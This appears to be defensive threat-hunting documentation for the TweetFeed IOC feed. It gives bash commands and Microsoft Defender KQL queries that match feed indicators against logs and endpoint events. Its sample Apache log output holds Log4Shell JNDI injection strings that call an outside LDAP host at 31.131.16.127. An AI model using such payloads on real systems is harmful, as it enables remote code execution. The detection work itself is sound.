Hunt
Hunt IOCs in different environments
- Bash commands
- Microsoft Defender for Endpoint (MDE)
Bash commands
Some bash commands to pull IOCs (collected from Tweets) straight from the CSV feed.
1. Get raw IOCs by type (url / domain / ip / sha256 / md5)
Command:
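# Fetch the feed and print column 4 (the IOC) of every row whose column 3 (type) equals {type}.
# `-f` makes curl fail on an HTTP error, so an error page is never parsed as feed data
# (without it the output file would be silently empty or wrong).
# Append `| sort -u` before the redirect if duplicate IOCs are not wanted.
curl -sf {CSV feed} | awk -F, '$3 == "{type}" {print $4}' > {Output File}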
Command example - getting suspicious URLs from today:
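# Example: today's URL IOCs into suspicious_urls.dat.
# `-f` aborts on an HTTP error instead of piping an error page into awk; column 3 is the
# IOC type and column 4 the IOC value.
curl -sf https://raw.githubusercontent.com/0xDanielLopez/TweetFeed/master/today.csv | awk -F, '$3 == "url" {print $4}' > suspicious_urls.dat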
Output example:
url1
url1
url3
url4
...
2. Get raw IOCs by tag (phishing / malware / CobaltStrike / Log4Shell / ...)
Command:
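# Print the IOC (column 4) of every row whose tag column (5) contains {tag}, case-insensitively.
# The tag column is lower-cased before matching, so the pattern is lower-cased as well;
# otherwise a tag written with capitals (e.g. CobaltStrike) would never match.
curl -sf {CSV feed} | awk -F, -v tag="{tag}" 'tolower($5) ~ tolower(tag) {print $4}' > {Output File}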
Command example - getting all IOCs related to CobaltStrike from today:
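# Example: every IOC tagged CobaltStrike today.
# tolower($5) lower-cases the tag column, so the pattern must be lower case too:
# the mixed-case pattern "CobaltStrike" can never match a lower-cased string.
curl -sf https://raw.githubusercontent.com/0xDanielLopez/TweetFeed/master/today.csv | awk -F, 'tolower($5) ~ "cobaltstrike" {print $4}' > iocs_CS.dat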
Output example:
url
md5
ip
ip
ip
url
domain
md5
sha256
...
3. Search IOCs in a file (e.g. log files)
Command:
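# Search {File} for every IOC of the given type.
#  - `sort -u` searches each IOC once even if the feed lists it several times
#  - empty values are skipped: an empty grep pattern would match every line of the file
#  - `grep -F --` takes the IOC literally, so dots in IPs and metacharacters in URLs are
#    not interpreted as a regex, and a value beginning with '-' is not read as an option
#  - `read -r` keeps backslashes in the IOC unchanged
curl -sf {CSV feed} | awk -F, '$3 == "{type}" {print $4}' | sort -u | while IFS= read -r ioc; do
  [ -n "$ioc" ] && grep -F -- "$ioc" {File}
done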
Command example - searching Apache access logs for IPs related to the #Log4Shell vulnerability:
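# Example: IPs tagged with log4* (the tag column is lower-cased first, as in the tag example
# above, so "#Log4Shell" matches) looked up in the Apache access log.
#  - `sort -u` searches each IP once even if several tweets report it
#  - empty values are skipped: an empty grep pattern would match every line
#  - `-F` matches the IP literally (a '.' would otherwise match any character) and
#    `-w` requires a whole-word match, so 1.2.3.4 does not hit inside 11.2.3.45
curl -sf https://raw.githubusercontent.com/0xDanielLopez/TweetFeed/master/today.csv | awk -F, '$3 == "ip" && tolower($5) ~ "log4" {print $4}' | sort -u | while IFS= read -r ioc; do
  [ -n "$ioc" ] && grep -Fw -- "$ioc" /var/log/apache2/access.log
done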
Output example:
170.210.45.163 - - [16/Dec/2021:21:13:00 +0000] "GET /${jndi:ldap://31.131.16.127:1389/Exploit} HTTP/1.1" 301 589 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
170.210.45.163 - - [16/Dec/2021:21:13:01 +0000] "GET / HTTP/1.1" 301 509 "-" "${jndi:ldap://31.131.16.127:1389/Exploit}"
170.210.45.163 - - [17/Dec/2021:01:48:06 +0000] "GET /${jndi:ldap://31.131.16.127:1389/Exploit} HTTP/1.1" 301 5228 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
170.210.45.163 - - [17/Dec/2021:01:48:07 +0000] "GET / HTTP/1.1" 301 5228 "-" "${jndi:ldap://31.131.16.127:1389/Exploit}"
Microsoft Defender for Endpoint (MDE) More info
These are only examples; adapt them to your environment.
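// Hunt: URL / domain IOCs from the TweetFeed week.csv export seen in DeviceNetworkEvents.
// MaxAge is the oldest event timestamp searched (events newer than this are considered).
let MaxAge = ago(30d);
let domain_whitelist = pack_array(
    'XXX' // Some URL/Domain you want to whitelist (compared as an exact string).
);
// Feed columns after parse_csv (0-based): [2] type, [3] IOC value, [4] tags, [5] tweet.
let TweetFeed = materialize (
    (externaldata(report:string)
    [@"https://raw.githubusercontent.com/0xDanielLopez/TweetFeed/master/week.csv"]
    with (format = "txt"))
    | extend report = parse_csv(report)
    | extend Type = tostring(report[2])
    | where Type in('url','domain')
    | extend RemoteUrl = tostring(report[3])
    | where RemoteUrl !in(domain_whitelist)
    | extend Tag = tostring(report[4])
    | extend Tweet = tostring(report[5])
    | project RemoteUrl, Tag, Tweet
);
// kind=inner keeps every feed row for a URL reported more than once (different tweets/tags);
// the default join kind (innerunique) would keep only one of them and drop the others' context.
// NOTE(review): this is an exact string match, so a 'domain' IOC only hits when
// DeviceNetworkEvents.RemoteUrl holds exactly that host name — confirm against your data.
TweetFeed
| join kind=inner (
    DeviceNetworkEvents
    | where Timestamp > MaxAge
) on RemoteUrl
| project Timestamp, DeviceName, RemoteUrl, Tag, Tweet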
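// Hunt: IP IOCs from the TweetFeed week.csv export seen in DeviceNetworkEvents.
// MaxAge is the oldest event timestamp searched (events newer than this are considered).
let MaxAge = ago(30d);
let IPaddress_whitelist = pack_array(
    'XXX' // Some IP address you want to whitelist (compared as an exact string).
);
// Feed columns after parse_csv (0-based): [2] type, [3] IOC value, [4] tags, [5] tweet.
let TweetFeed = materialize (
    (externaldata(report:string)
    [@"https://raw.githubusercontent.com/0xDanielLopez/TweetFeed/master/week.csv"]
    with (format = "txt"))
    | extend report = parse_csv(report)
    | extend Type = tostring(report[2])
    | where Type == 'ip'
    | extend RemoteIP = tostring(report[3])
    | where RemoteIP !in(IPaddress_whitelist)
    // The column is RemoteIP (defined above); the original referenced an undefined
    // TweetFeedIP here, which fails the query. Private ranges are dropped so a feed entry
    // for an RFC1918 address cannot flag ordinary internal traffic.
    | where not(ipv4_is_private(RemoteIP))
    | extend Tag = tostring(report[4])
    | extend Tweet = tostring(report[5])
    | project RemoteIP, Tag, Tweet
);
// kind=inner keeps every feed row for an IP reported more than once (different tweets/tags);
// the default join kind (innerunique) would keep only one of them.
TweetFeed
| join kind=inner (
    DeviceNetworkEvents
    | where Timestamp > MaxAge
) on RemoteIP
| project Timestamp, DeviceName, RemoteIP, Tag, Tweet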
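// Hunt: SHA256 IOCs from the TweetFeed week.csv export seen in process, file and image-load events.
// MaxAge is the oldest event timestamp searched (events newer than this are considered).
let MaxAge = ago(30d);
let SHA256_whitelist = pack_array(
    'XXX' // Some SHA256 hash to whitelist (lower-case hex, compared as an exact string).
);
// Feed columns after parse_csv (0-based): [2] type, [3] IOC value, [4] tags, [5] tweet.
// Hash values are lower-cased on both sides of the join: a hex hash is case-insensitive,
// but the string equality used by join is not, so an upper-case feed entry would never match.
let TweetFeed = materialize (
    (externaldata(report:string)
    [@"https://raw.githubusercontent.com/0xDanielLopez/TweetFeed/master/week.csv"]
    with (format = "txt"))
    | extend report = parse_csv(report)
    | extend Type = tostring(report[2])
    | where Type == 'sha256'
    | extend SHA256 = tolower(tostring(report[3]))
    | where SHA256 !in(SHA256_whitelist)
    | extend Tag = tostring(report[4])
    | extend Tweet = tostring(report[5])
    | project SHA256, Tag, Tweet
);
// kind=inner keeps every feed row for a hash reported more than once (different tweets/tags);
// the default join kind (innerunique) would keep only one of them.
union (
    TweetFeed
    | join kind=inner (
        DeviceProcessEvents
        | where Timestamp > MaxAge
        | extend SHA256 = tolower(SHA256)
    ) on SHA256
), (
    TweetFeed
    | join kind=inner (
        DeviceFileEvents
        | where Timestamp > MaxAge
        | extend SHA256 = tolower(SHA256)
    ) on SHA256
), (
    TweetFeed
    | join kind=inner (
        DeviceImageLoadEvents
        | where Timestamp > MaxAge
        | extend SHA256 = tolower(SHA256)
    ) on SHA256
) | project Timestamp, DeviceName, FileName, FolderPath, SHA256, Tag, Tweet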
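// Hunt: MD5 IOCs from the TweetFeed week.csv export seen in process, file and image-load events.
// MaxAge is the oldest event timestamp searched (events newer than this are considered).
let MaxAge = ago(30d);
let MD5_whitelist = pack_array(
    'XXX' // Some MD5 hash to whitelist (lower-case hex, compared as an exact string).
);
// Feed columns after parse_csv (0-based): [2] type, [3] IOC value, [4] tags, [5] tweet.
// Hash values are lower-cased on both sides of the join: a hex hash is case-insensitive,
// but the string equality used by join is not, so an upper-case feed entry would never match.
let TweetFeed = materialize (
    (externaldata(report:string)
    [@"https://raw.githubusercontent.com/0xDanielLopez/TweetFeed/master/week.csv"]
    with (format = "txt"))
    | extend report = parse_csv(report)
    | extend Type = tostring(report[2])
    | where Type == 'md5'
    | extend MD5 = tolower(tostring(report[3]))
    | where MD5 !in(MD5_whitelist)
    | extend Tag = tostring(report[4])
    | extend Tweet = tostring(report[5])
    | project MD5, Tag, Tweet
);
// kind=inner keeps every feed row for a hash reported more than once (different tweets/tags);
// the default join kind (innerunique) would keep only one of them.
union (
    TweetFeed
    | join kind=inner (
        DeviceProcessEvents
        | where Timestamp > MaxAge
        | extend MD5 = tolower(MD5)
    ) on MD5
), (
    TweetFeed
    | join kind=inner (
        DeviceFileEvents
        | where Timestamp > MaxAge
        | extend MD5 = tolower(MD5)
    ) on MD5
), (
    TweetFeed
    | join kind=inner (
        DeviceImageLoadEvents
        | where Timestamp > MaxAge
        | extend MD5 = tolower(MD5)
    ) on MD5
) | project Timestamp, DeviceName, FileName, FolderPath, MD5, Tag, Tweet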